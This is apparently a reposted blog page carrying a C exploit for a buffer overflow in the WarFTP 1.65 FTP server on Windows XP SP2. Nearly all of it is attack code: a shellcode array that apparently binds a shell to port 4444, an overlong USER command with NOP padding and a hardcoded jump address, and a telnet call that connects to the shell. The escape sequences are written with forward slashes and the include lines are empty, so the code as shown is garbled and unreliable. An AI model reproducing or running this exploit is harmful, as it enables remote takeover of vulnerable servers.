warftp1.65 exploit for winxp sp2

/********** warftp1.65 exploit made by hacker2005/netwind****************/
#include
#include
#pragma comment(lib,"ws2_32")
char shellcode[] =
"/x31/xc9/x83/xe9/xb0/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/xad"
"/x7f/x6d/x80/x83/xeb/xfc/xe2/xf4/x51/x15/x86/xcd/x45/x86/x92/x7f"
"/x52/x1f/xe6/xec/x89/x5b/xe6/xc5/x91/xf4/x11/x85/xd5/x7e/x82/x0b"
"/xe2/x67/xe6/xdf/x8d/x7e/x86/xc9/x26/x4b/xe6/x81/x43/x4e/xad/x19"
"/x01/xfb/xad/xf4/xaa/xbe/xa7/x8d/xac/xbd/x86/x74/x96/x2b/x49/xa8"
"/xd8/x9a/xe6/xdf/x89/x7e/x86/xe6/x26/x73/x26/x0b/xf2/x63/x6c/x6b"
"/xae/x53/xe6/x09/xc1/x5b/x71/xe1/x6e/x4e/xb6/xe4/x26/x3c/x5d/x0b"
"/xed/x73/xe6/xf0/xb1/xd2/xe6/xc0/xa5/x21/x05/x0e/xe3/x71/x81/xd0"
"/x52/xa9/x0b/xd3/xcb/x17/x5e/xb2/xc5/x08/x1e/xb2/xf2/x2b/x92/x50"
"/xc5/xb4/x80/x7c/x96/x2f/x92/x56/xf2/xf6/x88/xe6/x2c/x92/x65/x82"
"/xf8/x15/x6f/x7f/x7d/x17/xb4/x89/x58/xd2/x3a/x7f/x7b/x2c/x3e/xd3"
"/xfe/x2c/x2e/xd3/xee/x2c/x92/x50/xcb/x17/x7c/xdc/xcb/x2c/xe4/x61"
"/x38/x17/xc9/x9a/xdd/xb8/x3a/x7f/x7b/x15/x7d/xd1/xf8/x80/xbd/xe8"
"/x09/xd2/x43/x69/xfa/x80/xbb/xd3/xf8/x80/xbd/xe8/x48/x36/xeb/xc9"
"/xfa/x80/xbb/xd0/xf9/x2b/x38/x7f/x7d/xec/x05/x67/xd4/xb9/x14/xd7"
"/x52/xa9/x38/x7f/x7d/x19/x07/xe4/xcb/x17/x0e/xed/x24/x9a/x07/xd0"
"/xf4/x56/xa1/x09/x4a/x15/x29/x09/x4f/x4e/xad/x73/x07/x81/x2f/xad"
"/x53/x3d/x41/x13/x20/x05/x55/x2b/x06/xd4/x05/xf2/x53/xcc/x7b/x7f"
"/xd8/x3b/x92/x56/xf6/x28/x3f/xd1/xfc/x2e/x07/x81/xfc/x2e/x38/xd1"
"/x52/xaf/x05/x2d/x74/x7a/xa3/xd3/x52/xa9/x07/x7f/x52/x48/x92/x50"
"/x26/x28/x91/x03/x69/x1b/x92/x56/xff/x80/xbd/xe8/x5d/xf5/x69/xdf"
"/xfe/x80/xbb/x7f/x7d/x7f/x6d/x80";
int main()
{
 WSADATA wsa;
 WSAStartup (MAKEWORD(1,1), &wsa);
 SOCKET s,s1;
 struct sockaddr_in target;
 char buf[850];                   //buffer should be small.
 char remote_host[]="127.0.0.1";   //
 char command[]="telnet ";
 printf("warftp1.65 exploit made by hacker2005/n");
 s=socket(AF_INET,SOCK_STREAM,0);
 target.sin_family=AF_INET;
 target.sin_addr.s_addr=inet_addr(remote_host);
 target.sin_port=htons(21);
 s1=connect(s,(struct sockaddr *)&target,sizeof(target));
 if(s1==-1)
    {
        printf("[-] connect err./n");
  printf("ftp service isn't open/n");
        exit(1);
    }
 memset(buf,0x90,sizeof(buf)-1);
 memcpy(buf,"USER ",5);
 memcpy(buf+5+485,"/xfb/xc5/xd7/x77",4);                     //jmp esp:77d7c5fb
    memcpy(buf+5+485+4+10,shellcode,sizeof(shellcode)-1);
 memcpy(buf+5+485+4+10+sizeof(shellcode)-1,"/r/n",sizeof("/r/n"));
 SOCKET ret=send(s,buf,sizeof(buf)-1,0);
    if(ret<0)
 {
  printf("send err/n");
  return -1;
 }
 Sleep(1000);
 printf("try telnet remote host with port 4444/n");
 strcat(command,remote_host);
 strcat(command," 4444");
 system(command);
 WSACleanup();
}
more information:
http://www.milw0rm.com/exploits/3474
http://www.milw0rm.com/exploits/3482

你可能感兴趣的:(缓冲溢出技术,command,socket,struct,stream,service,system)